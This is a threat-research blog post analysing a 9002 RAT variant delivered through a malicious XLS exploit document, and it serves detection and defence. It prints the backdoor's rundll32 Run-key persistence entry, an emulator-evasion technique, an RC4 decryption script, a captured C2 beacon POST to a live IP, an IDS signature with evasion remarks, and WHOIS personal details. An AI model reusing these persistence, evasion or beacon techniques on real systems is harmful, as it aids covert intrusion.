After investigating a newer malicious XLS document presumably targeted at a Chinese national, I noticed some oddly familiar network traffic produced by the backdoor it dropped. It was very clearly a variant of the 9002 RAT based on its command and control traffic. The 9002 RAT first achieved notoriety back in 2009 in relation to the Operation Aurora attacks but also more recently last year in FireEye’s blog posts about the Sunshop Campaign.
However, the RAT itself is relatively uninteresting and beyond basic backdoor capabilities essentially serves as a platform to download and execute additional DLL’s. The part that first struck me this time was the persistence method; it used a standard Run key to call an export from the backdoor via rundll32. This is fairly typical of a DLL backdoor, but the export that was called when disassembled appeared to be nothing more than an infinite loop, which called the Sleep function. Somehow malicious routines in the backdoor would still start and it would begin beaconing so I decided to look a little deeper.
Technical Details
The document itself exploited the oldie but goodie, CVE-2012-0158 exploit. The title of the document roughly translated “Two accounted for in the peace process table”.
Document Details: MD5: 5E9EBB626F8483ABEB279F3CF90441ED File Size: 333,824 Bytes
The document contained another encoded document within its body beginning at offset 0xBE00 as well as an encoded executable beginning at offset 0x10C00. Both were encoded using the same scheme of a single-byte XOR against the byte 0x9C and a right rotational byte shift (ROR) of 3. The inner document is what would be shown to a potential victim upon successful exploitation and was saved as “%temp%\~tmp.xls”. The outer document’s metadata was stripped from the file; however, the inner document retained the last save date of March 11, 2014 at 1:05AM PST.
The dropper was signed with a valid certificate belonging to “A’digm Inc.” and was written to “C:\RECYCLER\bmp{hex digit}.tmp”. Where “hex digit” is a randomly generated hexadecimal digit.
Dropper Details: MD5: 33FC96A418AB7698DDBA97F240408B3B File Size: 265,200 Bytes Compile Time: 12/16/2013 03:08:29 UTC
Dropper Certificate Details: Serial Number: 45 6E 96 7A 81 5A A5 CB B9 9F B8 6A CA 8F 7F 69 Thumb Print: 91 24 87 EC CF 3E 76 82 06 9E E4 F2 B8 2F 25 21 B0 BD 3B 1C Validity: December 30, 2012 5:00 PM – January 30, 2015 4:59:59 PM Subject: CN: A’digm, Inc. O: A’digm, Inc. L: Gangnam-gu S: Seoul C: KR
Backdoor Details: MD5: 863A5521633B735185850222363CF853 File Size: 144,968 Bytes Compile Time: 12/09/2013 05:48:37 UTC
The dropper when executed will decode the backdoor from a resource section within its body named “RES” and write the decoded backdoor to the file “%CommonProgramFiles%\ODBC\Mshype.dll”. The backdoor was also signed with the same certificate belonging to “A’digm Inc.” on December 9, 2013, at 05:49:18 UTC. The dropper created several registry keys including a Run key to establish persistence on the victim machine.
Registry Changes: • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB923561 -> rundll32.exe “C:\Program Files\Common Files\ODBC\Mshype.dll”,Process32First • HKCU\Software\Transpan\RunPath -> rundll32.exe “C:\Program Files\Common Files\ODBC\Mshype.dll”,Process32First • HKCU\Software\TransPan\mshtm -> plain text configuration data (0x1F8 Bytes)
Persistence Mechanism: • Run Key in the victim user’s registry hive: • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB923561 which will call an export from the backdoor “Mshype.dll” via rundll32.exe
File System Changes: • %temp%\~tmp.xls • C:\RECYCLER\bmp{Hex Character(s)}.tmp • %CommonProgramFiles%\ODBC\Mshype.dll • %CommonProgramFiles%\ODBC\temp_k.ax (Stored Keystrokes) • May Create %temp%\{hostname}_p.ax • May Create %temp%\uid.ax • May Create %CommonProgramFiles%\ODBC\temp_plugin.ax • May Create %UserProfile%\AppData\Roaming\Microsoft\mscmos.ini (Vista+) • May Create %UserProfile%\AppData\Roaming\Microsoft\temp_plugin.ax (Vista+) • May Create %UserProfile%\AppData\Roaming\temp_k.ax (Vista+)
Volatile Evidence: • Creates the mutex “QPONMLKJIH” • Creates the mutex DirectInput.{89521361-AA8A-11CF-BFC7-444553540000} • Creates the mutex DirectInput.{5944E682-C92E-11CF-BFC7-444553540000}
What immediately struck me as odd about the backdoor was the persistence mechanism called the exported function, “Process32First”, which when disassembled does nothing more than sleep for five seconds in an infinite loop. Somehow though the sample would still begin to beacon out. I spent a few hours puzzling over this one before coming to the realization that when rundll32.exe uses the LoadLibraryW function to load “Mshype.dll” into its address space the DllMain function is called.
The DllMain function in turn contains a subroutine, which calls CreateThread with the start address of 0x10001022. This thread in turn intentionally raises an uncontinuable exception using a standard API call to RaiseException; the exception handler then starts a new thread beginning at 0x1000105B, which contains the beginning of the decryption routines for the actual backdoor. My current guess is the use of structured exception handling is used to bypass some common emulation engines used in malware analysis; unsurprisingly this sample has a current detection rate of two.
The 9002 variant still used an intermediary stage of self-modifying shell code before getting to the actual unencrypted code. Although the standard encryption mechanism has been significantly altered to use RC4 with a key of “0123456789” as opposed to a single byte XOR. The 1st stage is stored at file-offset 0xF040 and can be decoded using the python script below.
from Crypto.Cipher import ARC4 import sys with open(sys.argv[1], 'rb') as bin: binary = bin.read() try: key = '0123456789' rc4 = ARC4.new(key) decrypted = rc4.decrypt(binary) open(sys.argv[1]+'.dec','wb').write(decrypted) except: pass
Figure 1: Python Pseudocode to Decrypt 1st Stage Shellcode
The backdoor also included a DLL module inside of its body that would be loaded and run once decrypted. This DLL was designed to log keystrokes and other activity to the file “%CommonProgramFiles%\ODBC\temp_k.ax” or “%UserProfile%\AppData\Roadming\temp_k.ax” depending on the operating system. The keylogger itself was relatively uninteresting except for its use of DINPUT8.dll, a DirectX module more commonly responsible for providing joystick, mouse, keyboard, and other controller interfaces. This DirectX 8 interface provides the key logger more granularity in determining exactly what activity occurred on the system. Keystrokes were stored encoded in Unicode with a simple one byte XOR against the byte 0x56.
00000000 0D 56 01 56 1F 56 18 56 0B 56 5B 56 5C 56 2A 56 .V.V.V.V.V[V\V*V 00000010 2A 56 01 56 3F 56 38 56 32 56 39 56 21 56 25 56 *V.V?V8V2V9V!V%V 00000020 76 56 02 56 3F 56 22 56 3A 56 33 56 6C 56 76 56 vV.V?V"V:V3VlVvV 00000030 19 56 26 56 33 56 38 56 76 56 10 56 3F 56 3A 56 .V&V3V8VvV.V?V:V 00000040 33 56 25 56 76 56 2A 56 2A 56 64 56 66 56 67 56 3V%VvV*V*VdVfVgV 00000050 62 56 79 56 66 56 62 56 79 56 67 56 61 56 76 56 bVyVfVbVyVgVaVvV 00000060 67 56 62 56 6C 56 67 56 60 56 6C 56 65 56 63 56 gVbVlVgV`VlVeVcV 00000070 5B 56 5C 56 2A 56 2A 56 32 56 23 56 3B 56 26 56 [V\V*V*V2V#V;V&V 00000080 5B 56 5C 56 2A 56 2A 56 01 56 3F 56 38 56 32 56 [V\V*V*V.V?V8V2V 00000090 39 56 21 56 25 56 76 56 02 56 3F 56 22 56 3A 56 9V!V%VvV.V?V"V:V 000000A0 33 56 6C 56 76 56 01 56 3F 56 38 56 1E 56 33 56 3VlVvV.V?V8V.V3V 000000B0 2E 56 76 56 7B 56 76 56 0D 56 32 56 23 56 3B 56 .VvV{VvV.V2V#V;V 000000C0 26 56 33 56 32 56 78 56 32 56 3A 56 3A 56 0B 56 &V3V2VxV2V:V:V.V 000000D0 76 56 2A 56 2A 56 64 56 66 56 67 56 62 56 79 56 vV*V*VdVfVgVbVyV 000000E0 66 56 62 56 79 56 67 56 61 56 76 56 67 56 62 56 fVbVyVgVaVvVgVbV 000000F0 6C 56 67 56 60 56 6C 56 65 56 63 56 5B 56 5C 56 lVgV`VlVeVcV[V\V 00000100 2A 56 2A 56 6A 56 13 56 18 56 02 56 13 56 04 56 *V*VjV.V.V.V.V.V 00000110 68 56 5B 56 5C 56 hV[V\V
Figure 2: Example Encoded Activity from “temp_k.ax”
00000000 5B 00 57 00 49 00 4E 00 5D 00 0D 00 0A 00 7C 00 [.W.I.N.].....|. 00000010 7C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 |.W.i.n.d.o.w.s. 00000020 20 00 54 00 69 00 74 00 6C 00 65 00 3A 00 20 00 .T.i.t.l.e.:. . 00000030 4F 00 70 00 65 00 6E 00 20 00 46 00 69 00 6C 00 O.p.e.n. .F.i.l. 00000040 65 00 73 00 20 00 7C 00 7C 00 32 00 30 00 31 00 e.s. .|.|.2.0.1. 00000050 34 00 2F 00 30 00 34 00 2F 00 31 00 37 00 20 00 4./.0.4./.1.7. . 00000060 31 00 34 00 3A 00 31 00 36 00 3A 00 33 00 35 00 1.4.:.1.6.:.3.5. 00000070 0D 00 0A 00 7C 00 7C 00 64 00 75 00 6D 00 70 00 ....|.|.d.u.m.p. 00000080 0D 00 0A 00 7C 00 7C 00 57 00 69 00 6E 00 64 00 ....|.|.W.i.n.d. 00000090 6F 00 77 00 73 00 20 00 54 00 69 00 74 00 6C 00 o.w.s. .T.i.t.l. 000000A0 65 00 3A 00 20 00 57 00 69 00 6E 00 48 00 65 00 e.:. .W.i.n.H.e. 000000B0 78 00 20 00 2D 00 20 00 5B 00 64 00 75 00 6D 00 x. .-. .[.d.u.m. 000000C0 70 00 65 00 64 00 2E 00 64 00 6C 00 6C 00 5D 00 p.e.d...d.l.l.]. 000000D0 20 00 7C 00 7C 00 32 00 30 00 31 00 34 00 2F 00 .|.|.2.0.1.4./. 000000E0 30 00 34 00 2F 00 31 00 37 00 20 00 31 00 34 00 0.4./.1.7. .1.4. 000000F0 3A 00 31 00 36 00 3A 00 33 00 35 00 0D 00 0A 00 :.1.6.:.3.5..... 00000100 7C 00 7C 00 3C 00 45 00 4E 00 54 00 45 00 52 00 |.|.<.E.N.T.E.R. 00000110 3E 00 0D 00 0A 00 >..... Keylogger Details (In Memory Only): MD5: 901C45A594B9FC9CB27723B7CE430235 File Size: 69,120 Bytes Compile Time: 12/09/2013 05:41:33 UTC
This is probably the first in a number of future variants to come. A copious number of debug statements were left in the code and can be viewed using something like SysInternals’ DebugView.
Network Traffic Details and Detection
After the second stage is decrypted in memory the backdoor will use the configuration data stored in plain text in “HKCU\Software\TransPan\mshtm” and beacon to “180.169.28.58” on port 1080.
00000000 30 30 30 30 30 30 30 30 00 00 00 00 00 00 00 00 00000000........ 00000010 44 65 66 61 75 6C 74 00 00 00 00 00 00 00 00 00 Default......... 00000020 31 38 30 2E 31 36 39 2E 32 38 2E 35 38 00 00 00 180.169.28.58... 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050 00 00 00 00 38 04 00 00 67 00 6F 00 6F 00 64 00 ....8...g.o.o.d. 00000060 6E 00 65 00 77 00 73 00 70 00 61 00 70 00 65 00 n.e.w.s.p.a.p.e. 00000070 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 r............... 00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0 00 00 00 00 00 00 00 00 00 00 00 00 38 04 00 00 ............8... 000000C0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000120 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ................ 00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000160 00 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 ....8........... 00000170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000001D0 00 00 00 00 00 00 00 00 76 32 2E 38 00 00 00 00 ........v2.8.... 000001E0 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ 000001F0 FF FF FF FF FF FF FF FF ÿÿÿÿÿÿÿÿ
Figure 4: Configuration Data Stored in "mshtm" Registry Key
Two sample beacon packets are shown in the figures below:
00000000 33 31 30 32 0C 00 00 00 08 00 00 00 19 FF FF FF 3102.........ÿÿÿ 00000010 FF 00 00 00 00 11 00 00 ÿ.......
Figure 5: Sample Beacon Packet
The first beacon will always be preceded by the string “3102”. The next 4 bytes are the encoded payload size and the following four bytes are the decoded payload size. The payload data will also still be compressed using the LZO compression library. The second beacon utilizes a similar protocol wrapped in base64 and sent within HTTP POST requests.
POST /{Hex Number} HTTP/1.1 User-Agent: lynx Host: 180.169.28.58:1080 Content-Length: 2 Connection: Keep-Alive Cache-Control: no-cache AA
It may also beacon using an HTTP CONNECT request; however, this behavior was not observed in testing. The User-Agent used in communication makes these types of requests incredibly distinct and easy to detect as not many people even neckbeards use the command line browser lynx. The backdoor itself once decrypted in memory also appears to contain an old configuration block or perhaps a backup configuration block with a version number of 1.0; however, no activity was observed going to the address in it. The old configuration block pointed to “www.aestheticismwoods.com:443”; “www.aestheticismwoods.com” currently resolves to “202.55.5.177” and was first registered in May of 2010 using the email address “xutongshen_fj@hotmail.com”.
WHOIS Information for aestheticismwoods.com
Registrant Name: huangmeng Registrant Organization: huang meng Registrant Street: shanghai zhangheng Registrant City: shanghai Registrant State/Province: SH Registrant Postal Code: 201204 Registrant Country: CN Registrant Phone: +86.2161016550 Registrant Phone Ext: 0 Registrant Fax: +86.2161016551 Registrant Email: xutongshen_fj@hotmail.com
It’s clear that simple changes in protocol headers are much easier to make than rewriting the network protocol itself. Despite FireEye’s suggestion of using the trailing 20 bytes to make a network signature for the initial beacon, the proposed ones in Emerging Threats still use the full 24 bytes. Similarly, for the second type of HTTP traffic the signature below exists:
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Possible Trojan.APT.9002 POST"; flow:established,to_server; content:"POST "; depth:5; pcre:"/^POST\s+\/[a-f0-9]+\s/U"; content:!"|0d 0a|Referer|3a|"; distance:0; content:"User-Agent|3a 20|lynx|0d 0a|"; distance:0; reference:url,www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html; classtype:trojan-activity; sid:2017702; rev:2;)
It looks for an unnecessary number of additional headers and would not fire on this particular variant. I’d recommend just looking for POST requests with a User-Agent of “lynx”; if people are posting content to the Internet with lynx you probably want to look at it anyway (make sure to use the “tag” feature). I’m sure more simple header changes are in the future since that seems to be all it takes to bypass current network-monitoring devices and the present state of the security mindset. In the same vein, attackers are continuing to move back towards more traditional and other custom small encryption algorithms as the industry slowly begins to detect more XOR’d content. Attackers wouldn’t use these kinds of simple tweaks if they didn’t continue to work so effectively.
